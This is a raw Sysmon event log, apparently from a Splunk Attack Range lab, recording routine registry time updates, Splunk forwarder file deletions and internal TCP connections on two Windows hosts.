16:31:50.816{CB4067E1-304A-6062-0B00-00000000AF01}608C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x046d8b51) 13241300x8000000000000000246318Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-SetValue2021-03-30 16:31:50.816{CB4067E1-304A-6062-0B00-00000000AF01}608C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d72579-0xce614eda) 13241300x8000000000000000246317Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-SetValue2021-03-30 16:31:50.816{CB4067E1-304A-6062-0B00-00000000AF01}608C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d72582-0x3025b6da) 13241300x8000000000000000246316Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-SetValue2021-03-30 16:31:50.816{CB4067E1-304A-6062-0B00-00000000AF01}608C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7258a-0x91ea1eda) 13241300x8000000000000000246315Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-SetValue2021-03-30 16:31:50.816{CB4067E1-304A-6062-0B00-00000000AF01}608C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x8000000000000000246314Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-SetValue2021-03-30 16:31:50.816{CB4067E1-304A-6062-0B00-00000000AF01}608C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x046d8b51) 13241300x8000000000000000246313Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-SetValue2021-03-30 16:31:50.816{CB4067E1-304A-6062-0B00-00000000AF01}608C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d72579-0xce614eda) 13241300x8000000000000000246312Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-SetValue2021-03-30 16:31:50.816{CB4067E1-304A-6062-0B00-00000000AF01}608C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d72582-0x3025b6da) 13241300x8000000000000000246311Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-SetValue2021-03-30 16:31:50.816{CB4067E1-304A-6062-0B00-00000000AF01}608C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7258a-0x91ea1eda) 354300x8000000000000000246310Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:49.484{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64808-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000246309Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:50.113{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=058FBBBFBC6DEC6AA843965BAB192954,SHA256=6485CEEFE42A425A4259A1A7030BBEBE187D0CB55EF2A7F6825727FEFBC4B1FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246308Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:50.113{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FDF9EF583CACCE2AB08F5981585278F9,SHA256=D8D87C44DC411F71A503CEEFB0B90F830A737AA40C1F0E2329295E82D8B9D41E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246307Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:50.113{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CCE0A4AD733DFA6179C3B9BC4EC539B,SHA256=FA7A858A3A22ADA1DC8A5D66AFFF9C7B79797C067B17C3A3A64BA1E78F684C15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061520Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:51.392{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D5CFC080F2F00EC340F1C73154FC28A,SHA256=D8C0AE01C442BF262FE56DD4104FD101AC84C9294D9A3469E4F5E2962E17F95B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061519Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:51.111{7F8C56E7-4E4C-6063-3300-00000000AF01}2364NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=D9EB0706C587F50BBEE1233E6456AA7E,SHA256=500015F71F0118682B52F400F5B38916EBFAA2D1986DD68D3505915C1D0CDED1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246321Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:51.113{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52484A8E8A0643177DEDE488A1CDE386,SHA256=CEEDDB60CB042944E154F51431F7B7213B58FBA7564296287A46B49AF75F5D16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061523Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:52.783{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37275740BFDD9ADA60678B81A99E801A,SHA256=88D30F4C7FC08D071EF0FA53DA80F82835C06D2640716EC363F4A2AEB10E18A8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061522Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:49.927{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54840-false10.0.1.12-8089- 23542300x80000000000000001061521Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:52.095{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F57EEE06F6E85D2E27F707868BBC3BDB,SHA256=03A242A8F546402D8A4BC703A8CD957BD8FC718F08B907219CC901A994726794,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246323Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:52.691{CB4067E1-304B-6062-1200-00000000AF01}1008NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=F2D3A722C1F26D9E1C0F87D7EF05069B,SHA256=4BF63DE48E99B886F0C9C4978B491DD33D742CC5CE0EF9D1F87089B5B0C72F4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246322Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:52.113{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E008F497F65E70C80C41D53A2FB11AE,SHA256=CB6097C80277A172E4D000E65E7ED874595AC34B116AC169874C57331D6EFF7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246324Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:53.113{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D0E2F6AFEC147C1CB7B3E58F43624CB,SHA256=E298FA8CD841DE588AFF428E075BF50D74953A3DBDB9C57B1C5BE27570A71006,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061524Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:54.127{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3817E51011F943FDF9BB1BC6661D83B6,SHA256=C2F151F46EC0BC0E7CB7246E92A5DA5E2DD7A9A4F7BC13CE8FE76A1444F4C591,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246326Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:54.113{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=816F5D616653A1013CF54BE41D71C5C5,SHA256=7388D308B2595E0F0F6541A7675A780D7B4A1983D6798687ED5FE6C15C7796A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246325Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:54.066{CB4067E1-30AF-6062-9800-00000000AF01}2672NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=D9EB0706C587F50BBEE1233E6456AA7E,SHA256=500015F71F0118682B52F400F5B38916EBFAA2D1986DD68D3505915C1D0CDED1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061526Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:52.005{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54841-false10.0.1.12-8000- 23542300x80000000000000001061525Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:55.486{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A50705FEAD98262EBEE0248D5F155879,SHA256=FEDFA8491587730C63A3425B0426265C2DEDAB771021C09DF57DFEA95F56D125,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000246330Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:54.500{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64810-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 354300x8000000000000000246329Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:54.484{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64809-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 23542300x8000000000000000246328Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:55.129{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DDDFC47BE8CEF0DADFE0CE0A8542377,SHA256=36AF533078B45B6C74E774EB84F05F37D0D8C8EF3C98258FD8F16A7DB39D08CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246327Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:55.066{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=058FBBBFBC6DEC6AA843965BAB192954,SHA256=6485CEEFE42A425A4259A1A7030BBEBE187D0CB55EF2A7F6825727FEFBC4B1FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061528Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:56.846{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3224653F53398A3E6F38408D87D67474,SHA256=78F6F5A7ECBE8A80C2D115D16C6BF4674E897A413676C724CE53EE463F0FDAFA,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001061527Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-SetValue2021-03-30 16:31:56.033{7F8C56E7-4E3C-6063-1000-00000000AF01}100C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72582-0x32e18265) 23542300x8000000000000000246331Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:56.129{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D335C5A7207AFD33AC12E1B8085FA199,SHA256=2A4C3DDCC4D54FCC6ADCC773463190722CDC8361FE23D3A31D862621714D0EAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246332Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:57.129{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B05D91F92F8BE689FE00857A29B15B1,SHA256=33213CE86B3794F959FE5A8C25351695A4FD801461A73DBA19F0560109EB4DC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061530Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:58.205{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E113DC7CD0114970DDCFDA05C8B065C2,SHA256=61A1A82B72BE3E62CFC7B4E083C6E1A0A06356523522AF44C0FCABCE83E71F0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061529Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:58.205{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD57C64ACCB7C0008BDEAF444A71C595,SHA256=B5538DACC7C87CAB0F352FA8643DA47DAFF9A9E4454032E923EAC1263EAA2C61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246333Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:58.129{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59025EE74AE1C357A2A309A023C6D9A4,SHA256=6A31B095757981017AD5F61D3F77B6533CF94D377AE5EC0A9B6B50F75903B6F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061531Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:59.565{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE2E09EADEACDFCC8350EAE1F517F4A1,SHA256=6C19604CFD1FD34DBDF763F7A96CAB8FDDF4368F44FDE60DCEA47E80B4EDCEA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246334Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:59.129{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B6231ED61A2E15B84C5B93C2222C8B7,SHA256=605866430AB0344BF901C13CA79324CD9E1AAC37E5105D54A63AA4BD3F3698C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061533Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:00.924{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99BE84458191A82D67EDF8393145C0BC,SHA256=CE8937A3ACA42DA285AE63E46A73537D97166586862E5778607019AC080A7927,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061532Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:57.896{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54842-false10.0.1.12-8000- 354300x8000000000000000246338Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:59.515{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64811-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000246337Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:00.129{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=932D9343D6AAA306E0285EAF47D4B6FC,SHA256=8042FD0251952C5B043B5BD778E8F2D22ED0C582A2F6A135FAAEB97679EF63A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246336Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:00.129{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=945DC9B8D58535EBC252FC3D29215044,SHA256=3D7303900A01D379D7C2D70D34D98ACC83CAB0956FD700E0683169DF604C44C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246335Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:00.129{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=447AA17350411454F43728ECECDBEC97,SHA256=98149FBA441D1E1D2132A3D798CA4DEE5F8EA50AD846DF29E7224C38DD230B86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246339Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:01.129{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=688FD32D78CD92F6406CC529EA9F5734,SHA256=0FC44BE93692A6B7E0B2916BEE0A789010A8A7E92982D09FF2172401511EF5D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061534Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:02.284{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=964E4500FB03843A1D917E99498AF554,SHA256=36F1CFFB4010BF62910D0D5B4659B405EF41AA699B8E7BD85FA9D655E79E43EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246340Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:02.129{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0114007AF118368AEE9F029FB2754B0,SHA256=D202E0E1AEA251DFE05F217C87B66B45BD62E52E9F710BC3BB726562041EEDA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061535Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:03.643{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21767FA4E716F85188D5CBD306507F7A,SHA256=330EF9D199000882AEB91598151ECF66570DD6F132D5651EE8EC1198923234A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246341Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:03.129{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6DCD8E980731CB740849F1ADBEE423D,SHA256=2CF273D6570909EDFCC5BB1913A3D2194046993642BB73A15ACFE2618590E5F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246342Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:04.129{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C07CA9068A0534CFA46C9A189C827BE,SHA256=344AEEF29A0ACA84C5F8D8F1096140A906864AF883AEC268C8F40E825FA86440,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061536Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:05.003{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=321F6F6292ED9100E16C0A671D7A3811,SHA256=978A88443A6A7F2BC9E4D0391C49F7406A7848C17DCF471EED18356D04744841,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246345Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:05.129{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9465EB17782F09ED6EF512764818D145,SHA256=7A9B77F665828DF9D195B0BA4A0BC05FE56C0DA3608D9F1D06354FDF67791330,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246344Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:05.129{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12C1D09E49CA966E74059A5AA387DC21,SHA256=193B2C33F198D1C244479D1E02A3FBD9DD6F04A6A314AE4C97F08B156106C3B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246343Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:05.129{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=932D9343D6AAA306E0285EAF47D4B6FC,SHA256=8042FD0251952C5B043B5BD778E8F2D22ED0C582A2F6A135FAAEB97679EF63A9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061538Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:03.834{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54843-false10.0.1.12-8000- 23542300x80000000000000001061537Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 